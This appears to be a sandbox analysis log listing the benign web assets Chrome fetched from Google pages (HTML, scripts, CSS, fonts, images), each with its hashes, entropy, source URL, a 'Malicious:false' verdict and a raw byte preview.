                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (422)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):144089
                                                                                                                                                                                                                                                            Entropy (8bit):5.161470637029019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:h2ZzjJPtHblv9jV/tbvPOyTcsyLmLfL8LsLlLGLasCAE3wfcDjhHFqX:bcjCyJ8KzHS
                                                                                                                                                                                                                                                            MD5:BE29E76B73A13B4A09FF05FEE937A8F7
                                                                                                                                                                                                                                                            SHA1:DAB6D730DB4589A104541539F466D0F149F77C6C
                                                                                                                                                                                                                                                            SHA-256:C17391D60AF75A8ECB786BC2919971F98E7DCEC7B843073EB08E05511088A3E0
                                                                                                                                                                                                                                                            SHA-512:8B70A477184D7AABF828DAE81A9474CCAC6B9B2127B818FF9BB49D2E2323DC5CC3C54F8116B1D636E99B56B7C2201C058B57AC53A10C7AA496C20D5CFCA8D9F7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/stories/year-in-search/
                                                                                                                                                                                                                                                            Preview:..<!DOCTYPE html>....<html lang="en" dir="ltr" class="google glue-flexbox " locale="root" user-region="north-america" path="/stories/year-in-search/">. <head>. <meta charset="utf-8">. <meta content="initial-scale=1, minimum-scale=1, width=device-width" name="viewport">. <title>Year in Search 2022 - Google</title>. <meta name="description" content="Discover the top Google searches of 2022, including the most searched questions, the most captivating moments, and the most inspiring people.">..<script type="text/javascript" nonce="Ro_JdzKrZmJB0MXzC_4R7Q">.window.dataLayer = window.dataLayer || [];.window.dataLayer.push({. 'gtm.blacklist':['customScripts','nonGoogleScripts','nonGooglePixels','customPixels'].},{. 'locale_fallback': (document.childNodes[1].attributes.locale || {}).value.});.</script>. Google Tag Manager -->.<script nonce="Ro_JdzKrZmJB0MXzC_4R7Q">(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':.new Date().getTime(),event:'gtm.js'});var f=d.getEl
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x500, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41947
                                                                                                                                                                                                                                                            Entropy (8bit):7.980970121972275
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:10pKLAki1HcSOIcL+9ga9A2MyIqMzJDeMtJ+4AJ/+d:10MAk2Hg6ga9A2MX/JyMj+RJ/2
                                                                                                                                                                                                                                                            MD5:A64E5F3DB1F677CD537C4A0F180E9729
                                                                                                                                                                                                                                                            SHA1:EC71EEB7569CFABBCDE3103BBBCDA6DEC70DE2CB
                                                                                                                                                                                                                                                            SHA-256:00E4C07451D975C3841686020AE6F2D4A3473A7EE70A641D255F7D20BCBDFB46
                                                                                                                                                                                                                                                            SHA-512:8F254772F04835BFE49F0BB5468D3485C905D8D7D231FC34362C6FE2ECD3033D771AF746C33AED21F5899A4B30CF5236D92E7C1881953353DA74F8A39BD20FCB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF..........................................................................................................................................................."..........................................N.........................!..1AQ.."aq2.....#B..Rr...$3Cb...Dc...4S...s.....%.................................6........................!1A.Qa."2.q.B..#...3R...br..............?......rN.o..3.h...m_.z*'.}.?y_..f..TK.c~.?....4j.D.@.i....L8-.).c.>/r.72..E...(c.e.}...z1....<CM-.9.."...zG.n.........m..Nm....Fv.#...a3h..;)...._.G.:...6...8..........5......./asi..Q..,.....gM.(z..~)......z.E>..;.=.;I......&...@...~.=..W.pK.o....4T....(...<.{8......5.:r..k...3........E........e....n.q.6.%.....'.k..xv..|.D{<S.p...'..2......8.,8.L....).hy..I..w..?E.N...n....\/.FUb=6.N.w.m....Z.By.....6...P....O[...:J(..|.']y...5..........+t......l.D5.l......*d1b..,..f.Yn.JQ@5..'.B....?..U.c.....f.y ...=.....e.\w+...1....k"..KV.{W=...-]1.f.v.."..`j.*.1DG.o.6pR....D4.8)Sf%.G.........p\
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1657)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):237041
                                                                                                                                                                                                                                                            Entropy (8bit):5.662468033968671
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:htubPtnwAI/AaygRMlI/e1qCREo2eafp1oYmP5KMbHsFtMhep:hYVI/SgTGREDfDoRRbHsFtv
                                                                                                                                                                                                                                                            MD5:98F1D88190B984F5422AD95F16C4ADFB
                                                                                                                                                                                                                                                            SHA1:15ECAC17C91F35EE60E2AD048C2DB4EB2AB38D2A
                                                                                                                                                                                                                                                            SHA-256:1A9BE99352C6B8BC5EE57F65EC4625F8E1490379C07E59F1D7F78BAB2ECD7739
                                                                                                                                                                                                                                                            SHA-512:846E5F048392614584B25ABAE36C2100766046F4920F1956EB10630D1F4711FFDAC7F8D2A6E36535CE0E50C98C2560DFF0E1E8BED1C537440A5C9290F2B2983C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverWebsiteTranslationUi.en.o0mxDulwOdA.es5.O/ck=boq-translate.TranslateWebserverWebsiteTranslationUi.2YpHW3SIPH4.L.B1.O/am=8CwACA/d=1/exm=A7fCU,BBI74,BVgquf,COQbmf,CXsKQe,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KG2eXe,KUM7Z,L1AAkb,LEikZe,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P5Thrf,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,U0aPgd,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,VwDzFe,XVMNvd,Z5uLle,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,byfTOb,e5qFLc,fKUV3e,gychg,hc6Ubd,kWgXee,lsjVmc,lwddkf,n73qwf,ovKuLd,pKzUve,pjICDe,pw70Gc,s39S4,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zbML3c,zr1jrb/excm=_b,_r,_tp,iframenavigationview/ed=1/wt=2/rs=ANkVxDmi4UYesv_--ainEA18nAlROTRZyg/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;zxnPse:GkRiKb;EVNhjf:pw70Gc;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;NSEoX:lazG7b;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=sJhETb,i5dxUd,m9oV,JH2zc,bTi8wc,i5H9N,RAnnUd,PHUIyb,VNcg1e,DFTXbf,t1sulf,uu7UOe,wg1P6b,J1hrIc,JWUKXe,soHxf,qNG0Fc,HwavCb,qRXAtf,yRXbo,ywOR5c,tQKCld,thZ3rf,L2d1X,tsNC9c,QM0Gm,PxcVCe,JzDP5e,rFVO7,W225x,cSdwA"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverWebsiteTranslationUi=this.default_TranslateWebserverWebsiteTranslationUi||{};(function(_){var window=this;.try{._.w("VoSq8");._.rla=_.M("lN8i5b");._.z();./*.. Copyright 2016 Google Inc... Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGE
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1490)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):50234
                                                                                                                                                                                                                                                            Entropy (8bit):5.521600788203435
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:HvzanvBCwsN7sP5XqYTL+CyfnHOlTjtlnone2V6KHmCgYUD0ZTXEwyVfZs6:ranv1r5hTiDHO9tlnop7UwyVN
                                                                                                                                                                                                                                                            MD5:54E51056211DDA674100CC5B323A58AD
                                                                                                                                                                                                                                                            SHA1:26DC5034CB6C7F3BBE061EDD37C7FC6006CB835B
                                                                                                                                                                                                                                                            SHA-256:5971B095CFF574A66D35ADA016D4C077C86E2DEA62E9C0F14CF7C94B258619DE
                                                                                                                                                                                                                                                            SHA-512:E305D190287C28CA0CC2E45B909A304194175BB08351AD3F22825B1D632B1A217FB4B90DFD395637932307A8E0CC01DA2F47831FA4EDA91A18E49EFE6685B74B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=this||self,n=function(a,b){a=a.split(".");var c=aa;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var p=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},q=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};function t(){for(var a=u,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function v(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var u,w;.function ba(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=w[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}u=u||v();w=w||t();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&2
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 28288, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):28288
                                                                                                                                                                                                                                                            Entropy (8bit):7.993545548481223
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:768:MJDKJA5uoN/hxubA7/2GW5EDDL7pSUnd3Jp:MMC//hxz7+p5ipbnJJp
                                                                                                                                                                                                                                                            MD5:53B5E785DFDCA21FA7ADF7119FA1F8CC
                                                                                                                                                                                                                                                            SHA1:A3A86DFD216AD29183BA5493AE39D45B62F9D8B8
                                                                                                                                                                                                                                                            SHA-256:4A6FAB14BFE7B33FE5DC5349A2BB3720037E0ED7EBE621B352340F9514D83C08
                                                                                                                                                                                                                                                            SHA-512:615020BBDCAEC3B8E7FB0FD2B8C5CDAF3C4013C9323B6884FDAED5151788E213260C01C7CCD766898EE91612AB6163150167F9CC7109700B571B546E39F7CB41
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......n.......!...n...........................0......"?HVAR...`?STAT..'..../<.............0..^.6.$..F. ..>. ..[..q.v.uaFoV.B.52.L7. w+.I...D..5l...OL*ch.}R.A......HA.0.6G....L...Rk.9.T.>HI....z.F...p..V.b..C..%.!....Q.7L....x.V.bf..s..[M.K)...v.J......=}-....6...I.~..G\`p.i...%.eTX. 3...E.0..?..w|03c`&...."..."e=y..?..U.t.3....?.s.h...=Ir1...I.A...bZT>....PQ.......sjT..R.A.r....H8hXb.3..I....'../.......<J.EJ.%.....x...?...|...T.v..+l.'...6.:....|sl...>.....$,Y.;.`.8...U@....'pq.....=..2M..v...%Z.....N....5......:9.m...!f...I.....H..._~..Elgh.."v.e..|. ..t~.Q.#.....-..P....4.z..e..waZ...z...d.....V......Ry..e.?y.s......J.P...g.1.^..M..v@....E:..|..L_...KR.+~F.G.......9;5VbZS...`..8^Hq..~lm..jzq.1B.2~.......%.....*.....0....s.....n....R1A,...+.~$.a.7.c.........F..BJ..;.:!.'..$..(.....`../U........p.#(/.>'......'.6...n.....Rr.P.@.....`X7...@..t.FS%.r..M.,iR..%W..W.#%{g99.6N..8.........R..^...@:.PU.....).r..dv.@.+..U....<...........62#*#..I.h..7t..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):408864
                                                                                                                                                                                                                                                            Entropy (8bit):5.172341065871484
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:zfaNZt7uqt0ejVnTIon6QpkQpF/FD3MZoWzC3M8nG4by7Oxk7/DUzgrgJcnMxByE:zfaNZCej/uoWV/2dPBzHo8z
                                                                                                                                                                                                                                                            MD5:EC9D382A231C38C0D0BC6524FD2485DA
                                                                                                                                                                                                                                                            SHA1:334974937A8BC07E846DA5BA93051EE70C14A6DE
                                                                                                                                                                                                                                                            SHA-256:627B65348371145AAABE55E47CD88F930AC1DECEEE9035C225E2599620B31809
                                                                                                                                                                                                                                                            SHA-512:5C1EE075E33AF2AB0A188720C30ABB399FFD818DA806F35064B4FB5685782E8922BA96BB1A6E21E29167F13C64E7D01BBBD8BA01B403EEFFD3AC75F32C9ED884
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/s/player/59acb1f3/www-player.css
                                                                                                                                                                                                                                                            Preview:@charset "UTF-8";.html5-video-player{position:relative;width:100%;height:100%;overflow:hidden;z-index:0;outline:0;font-family:"YouTube Noto",Roboto,Arial,Helvetica,sans-serif;color:#eee;text-align:left;direction:ltr;font-size:11px;line-height:1.3;-webkit-font-smoothing:antialiased;-webkit-tap-highlight-color:rgba(0,0,0,0);-ms-touch-action:manipulation;touch-action:manipulation;-ms-high-contrast-adjust:none}.html5-video-player:not(.ytp-transparent),.html5-video-player.unstarted-mode,.html5-video-player.ad-showing,.html5-video-player.ended-mode{background-color:#000}.ytp-big-mode{font-size:17px}.ytp-autohide{cursor:none}.html5-video-player a{color:inherit;text-decoration:none;-webkit-transition:color .1s cubic-bezier(0,0,.2,1);-o-transition:color .1s cubic-bezier(0,0,.2,1);transition:color .1s cubic-bezier(0,0,.2,1);outline:0}.html5-video-player a:hover{color:#fff;-webkit-transition:color .1s cubic-bezier(.4,0,1,1);-o-transition:color .1s cubic-bezier(.4,0,1,1);transition:color .1s cubic
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):227
                                                                                                                                                                                                                                                            Entropy (8bit):4.793371890350351
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:YWCLlKRiYRFLlKRiYn3C237urKPW0bEdyZ1LMzMePFC:YFBKw0FBKw8Cmv+0bEgYC
                                                                                                                                                                                                                                                            MD5:B88036540E6B15F79BF572970954BD15
                                                                                                                                                                                                                                                            SHA1:908F32139DF8025DC470FD858E8DE9E6807A17F8
                                                                                                                                                                                                                                                            SHA-256:1098BF152969D2AAA152E4BE825CD28A64A925D3C852BA5DBB9EC88564DC69BA
                                                                                                                                                                                                                                                            SHA-512:23B63067348AB453A28720E74A95F32D18D76C5CA9378AB39C577563E260EEF0F9590AB4DD2454CADA4968243C7444FD4023F913A0E2EAD084902F6F79127E96
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://translate.google.com/_/TranslateWebserverUi/manifest.json
                                                                                                                                                                                                                                                            Preview:{"name":"Google Translate","short_name":"Google Translate","start_url":"/?lfhs\u003d2","display":"standalone","theme_color":"#4285F4","icons":[{"src":"//ssl.gstatic.com/translate/favicon.ico","type":"image/*","sizes":"64x64"}]}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1000 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):189454
                                                                                                                                                                                                                                                            Entropy (8bit):7.99575455409089
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:rOxDJI4LjsiNQSWqp0hr2J9ljypPu7GkF+MpkNXlxilsZavB3icpfp9cSB14Z4Zs:cDvPpQSWqpyajIBkYvXlxilsk5icpfpM
                                                                                                                                                                                                                                                            MD5:207F6CA14D98109B76B9D4CBDF33B0B2
                                                                                                                                                                                                                                                            SHA1:A6B6C3161836CE3816084C070437F997A9B155D3
                                                                                                                                                                                                                                                            SHA-256:3C0E6F7C814E00574706C951B2313411D49250DBBE20338FB13CED696A0F2CC3
                                                                                                                                                                                                                                                            SHA-512:0881505C2BC18B7B1C9CA6D8A7847CBC89351F317C1F47B7D8204DF2639BE9F48C0DC94CF9EB1A0DBDB1514C802150C88AC769E396EA2026EEAFBCCEAC47EDEF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2018/usmar-ismails-97th-birthday-6322954328604672-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR................S....PLTE......................................................................................................................................................................................................................................{NG>...wvuEB>.........=6,:3+ .....ea\=81`YR............($.IA5C<1...qmh..r....uiZPBME8.........A9...~^RB]TGrh\71(1+#$ ...........{o.rbRPO4.&...xl[.....ttgU..y..ph\KpdT......-'!j^N...m_LmaPbWG...pbP.q[eYIwgSUL?..v.ygxjV...YN?..nLB5...F>3|o].........QG9SI;aUD......VK<.......t^seQ|mX.zd..{..n.wa.}j.}f.....j..w..v..y..r..z...................................~.........................................................................................~..................................................Z.G....IDATx...Ub.0..`SM.QV.)v..%...|............................... .....Q...(...$.O.t<.D.8...3_x..a.{......(..0..4...z.@.d.78...TY^.....FnUy...Re.....9=...8#k..nE....9..............
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):7488
                                                                                                                                                                                                                                                            Entropy (8bit):7.965860210239532
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:2ZXvXhWHsC9Z+hdvuE7ZSasF9ykbA4RexyhFBXkitvWLim+hGGR1AlzIszE+V0ml:2Nvo7+7pajykbQKFxkitv/xCXoFm4zM
                                                                                                                                                                                                                                                            MD5:7F3E0778361E2C8538BC55C78FA5122D
                                                                                                                                                                                                                                                            SHA1:C8A50AC5168FCCE04C3FD2BC8D13E3BD76FEEB2B
                                                                                                                                                                                                                                                            SHA-256:BA4285823DD8C5ED26101FFABBCBDEDD31DFCB7CCDC8802178786843A8E8C112
                                                                                                                                                                                                                                                            SHA-512:D63CAFA8F1554EC4A2D51D5CCBA00F35C3469812206BBBB98C491A207771594F5C1BEA018ADC94D280C9D5D0F5F24478F2C0409C74EFD873B368C499553DCC2D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/92/ba/f4fdebdd412d8249c1fdf4c4961f/app-store-badge.webp
                                                                                                                                                                                                                                                            Preview:RIFF8...WEBPVP8X........l.....ALPH......T.v..B..A..Cx..@fP1p.....@x....ogz'7"&.G...")t.|k.iY=.t..>.Q..i.....z.k.=....&.......EO.]?..Y.....dY{.....<..'.GM.-.....T.A5.../...../...../...../...../......T.N5>.f..,.j..h..#.......f..7.q.m.3.;..c.|!...^.e...\6..e.8^.V..T.J....d..?...........VP8 .........*m...>m2.G.".!$..H...in.>...P..6...%.............?._.y....`......./...^..K.y....._....q.0...0/v.....W.O.}..]........._.?....L._`...?..l................?.%.s.../.....?............'.'..BG..e....EH..".T..R*EH..".T..R*E;.#A.GeIZ....r.q~..U.N....*..........bT.....:...{.$..*.<..OW....l2.E..l.|.X2~k..b..1.D....s....]...3D.(...Y........'u....:.>.h(.;.E....(.$\..A......(...5..m8R.....y9...Tf.F....F.%...$.......W..0...M.._...{~...4.....$..l.O..M0.0......[R.........1.........{.X...7......j.t...H.....O......?z.(.9a.D/.\.:.M..g..8...A4..8.......b.Q(...*,......2N.......e!.9mS$...E..]5..."~.T......0...N!k..........G....f...+....D...8...U.4..<R...y2y).
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x334, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31818
                                                                                                                                                                                                                                                            Entropy (8bit):7.9609427223282285
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:qQterzZDiS6tRItoafNn9VSsYxSbOxFzc67NDA2:3tIbbrJbOTzp7NDA2
                                                                                                                                                                                                                                                            MD5:1D97CD0EB53D512E7F8C03D83B477830
                                                                                                                                                                                                                                                            SHA1:42F135E43562638E86D2B6725B5B6374855375BF
                                                                                                                                                                                                                                                            SHA-256:82E4C38B340747CB6AC53C3EEECA6E1CF275B2E0E447F42526A7F5CEC833C132
                                                                                                                                                                                                                                                            SHA-512:8898F9DD81EFFC3102A3169B677AE794FB23AFC5ED215BC20465B5C3A44CDD17ABADC9E1ACFD482D0524C8A489171CF29503FFEB359F4D17A71264269E366FBC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................N....".........................................P.........................!1.AQ.."aq.2....BR.#b......3r..$CS.........4.c...DTd..................................1........................!.1.."AQ.aq2..BR...#..$............?..b....l'..l+Z..<.`...3[V....hP.@.....(P.@.....(P..O..|..y..f....)p.2&..`u......,YK..%.......2&.....X...9..U..q?n<)..)..D..6.A..+P..@..2..&..{t6.....R|(i..I..Y^..<j.i.w....5y....,....x.9..s%.A$..R...e...H)mm....L.$k.AY.j..c.4..4*..k...Ke7....*...A....f..?.m...Z\B..hPRT:.'B<..H5.k....hP...(P.@.....(P.@.....(P.@.....+".B.2k.(P..B....(P..B....P....(.z..k3@....hP.&.jhR0..P.M.`k4R...D.[MiY..6.(P4.......i.5.......(P.*.2)....B.ya.$jI...... .n3c..~..YY.l..=.e.JF.J:....j>....:.`.E.J.C.*...9U..U....>..u.-V.{.!3...J...'R5.H.5.w.A.....'...e'.....\.}.C...Z.P.T........qUz..C....I&?W..:....l.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):87337
                                                                                                                                                                                                                                                            Entropy (8bit):7.974560988679148
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:bMcRM8COURXOdWFQT1YFdBUWvpLYh/j6/odj2HRF+nI/FU/YQa8ZdpaOatSvZFF:bMcbdIjWaFHcLJSPf/+d/a0FF
                                                                                                                                                                                                                                                            MD5:12ED06671CB16B8B2C933AB279C33CAA
                                                                                                                                                                                                                                                            SHA1:43919A783C8C06BB695A4CA207D9F40C5D542F83
                                                                                                                                                                                                                                                            SHA-256:8493125A9E8196E2C38F39169E39BD0CCA954814507660F979C1BC002044F9FF
                                                                                                                                                                                                                                                            SHA-512:2DD5A942AEA77BC29BF6DAACC8571476E4C61E8FFCEBCE48B03C651F761F16AC3137E2516419366C7C703FA1523B9D619C6EF79E36C6D19BF23D42BEA8DF4226
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/-tJ0exa-sFRDGwxCfFtT3kaKnhcmHAvtjqHDP41VZhmjMHrNxR7jTkuXxHlonYHF-0oB9I62PsCqlLDA2P8bGcuVdx2yoV5n02Luyqj5E_Sn1kPHeg=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................M....".........................................J.......................!..."1.A.#2Q.Baq.3R.....$b..C...Sr.....4.%DTcs....................................B.......................!.1AQ.a.."q.....2...B.#Rbr....$3.....6D4............?...z...;.GX.I..1...VH..1..6........\H.=I.-..(.f.W..p.o&*UC.2.l....!.uLB.N......= ..0.J...l*..[.<I$.m.!.=2.S..`..k.`1aB...`..$.4...Ma.......^....._..D..J.$..W..RD..4r...p...%.9.R..:.0.......P.J..$g..QO..X.../,.B3...LA+..LH......@...^..>l....c.YU....O$.*4...{.h..h.<\e.....|.}.v.$...;~V4.#d....V.yS$K!]...C...h.@.L.........c4....&1.@...F... ....4.5<2.....Bg..O...8.X....<. c.....L..RO.g.I..3.?, B..%....p.........q.1..V.P1m.fd.Oh..[.u....O...q-....I.%.Pl..S.....|..l..i546..............i....d.b.`..!gb2`..;V.x..*...wT..B+.)...0..J hO......A....d..'...UN..4.e~_.X.S..S.!.t.R@..l.f..`...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14116
                                                                                                                                                                                                                                                            Entropy (8bit):4.65552037622446
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:xkV/Jtv95PDg1g0Sx3Leu4UX644Y48TeJKCR3jIL3n4Z:xkV/JtvPca0Sxbeu4UX644Y46KKCR3Au
                                                                                                                                                                                                                                                            MD5:AD4439B83B65F1CA4CD6C81178DBC6A5
